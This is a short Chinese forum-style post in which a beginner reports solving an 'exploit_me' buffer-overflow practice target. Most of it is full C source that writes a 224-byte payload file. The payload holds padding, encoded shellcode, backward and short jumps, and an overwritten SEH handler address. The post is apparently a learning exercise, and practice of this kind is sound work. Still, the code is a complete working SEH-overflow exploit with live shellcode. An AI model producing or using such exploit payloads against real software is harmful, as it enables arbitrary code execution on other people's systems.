刚学了几天溢出,看到这便想拿来练练手,竟然做出来了。倍感有动力。
代码:
#include <stdio.h> #include <windows.h> int main() { HANDLE hFile; PVOID buffer; DWORD BytesWritten; DWORD shortjmp = 0x9090f9eb; DWORD handler = 0x00280b0b; char shellcode[] = "\xd9\xcb\x31\xc9\xbf\x46\xb7\x8b\x7c\xd9\x74\x24\xf4\xb1" "\x1e\x5b\x31\x7b\x18\x03\x7b\x18\x83\xc3\x42\x55\x7e\x80" "\xa2\xdd\x81\x79\x32\x55\xc4\x45\xb9\x15\xc2\xcd\xbc\x0a" "\x47\x62\xa6\x5f\x07\x5d\xd7\xb4\xf1\x16\xe3\xc1\x03\xc7" "\x3a\x16\x9a\xbb\xb8\x56\xe9\xc4\x01\x9c\x1f\xca\x43\xca" "\xd4\xf7\x17\x29\x11\x7d\x72\xba\x46\x59\x7d\x56\x1e\x2a" "\x71\xe3\x54\x73\x95\xf2\x81\x07\xb9\x7f\x54\xf3\x48\x23" "\x73\x07\x89\x83\x4a\xf1\x6d\x6a\xc9\x76\x2b\xa2\x9a\xc9" "\xbf\x49\xec\xd5\x12\xc6\x65\xee\xe5\x21\xf6\x2e\x9f\x81" "\x91\x5e\xd5\x26\x3d\xf7\x71\xd8\x4b\x09\xd6\xda\xab\x75" "\xb9\x48\x57\x7a"; char longjmp[] = "\xe9\x6b\xff\xff\xff"; buffer = malloc(224); hFile = CreateFile("F:\\desktop\\exploit_me\\exploit_me\\4\\1.txt",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); memset(buffer,0x41,67); memcpy((char *)buffer + 67,shellcode,144); memcpy((char *)buffer + 211,longjmp,5); memcpy((char *)buffer + 216,&shortjmp,4); memcpy((char *)buffer + 220,&handler,4); WriteFile(hFile,buffer,224,&BytesWritten,NULL); CloseHandle(hFile); return 0; }